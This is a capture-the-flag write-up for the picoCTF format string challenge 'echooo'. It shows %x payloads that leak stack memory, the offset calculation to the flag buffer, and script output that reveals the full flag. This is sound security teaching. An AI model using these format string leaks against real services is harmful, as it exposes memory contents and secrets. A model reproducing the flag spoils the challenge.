Binary Exploitation - 300 points
This program prints any input you give it. Can you leak the flag?
Connect with nc 34802.
If only the program used puts...
Format string exploit
Check that the stack is printed properly
$ nc 34802
Time to learn about Format Strings!
We will evaluate any format string you give us with printf().
See if you can get the flag!
> %x
> ABCD %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x %08x
ABCD 00000040 f76e85a0 08048647 f771fa74 00000001 f76f7490 ffb8dcd4 ffb8dbdc 0000048f 08cd8008 44434241 > 8x 00000040 f76e85a0 08048647 f771fa74
> ABCD %11$08x
ABCD 44434241
So we know that offset 11
points to buf[64]
And to reach flag[64]
, we need to read past 64 bytes of buf
So start the offset from 11 + 64 / 4
and the offset for flag is at 27
echooo $ python
[+] Opening connection to on port 34802: Done
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Progress: pico
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Progress: picoCTF{foRm
Received: 735f7434
Progress: picoCTF{foRm4t_s
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Progress: picoCTF{foRm4t_stRin
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Progress: picoCTF{foRm4t_stRinGs_a
Received: 445f6552
Progress: picoCTF{foRm4t_stRinGs_aRe_D
Received: 65476e61
Progress: picoCTF{foRm4t_stRinGs_aRe_DanGe
Received: 73753072
Progress: picoCTF{foRm4t_stRinGs_aRe_DanGer0us
Received: 3866335f
Progress: picoCTF{foRm4t_stRinGs_aRe_DanGer0us_3f8
Received: 64656362
Progress: picoCTF{foRm4t_stRinGs_aRe_DanGer0us_3f8bced
Received: 000a7d33
Progress: picoCTF{foRm4t_stRinGs_aRe_DanGer0us_3f8bced3}
[*] Closed connection to port 34802
echooo $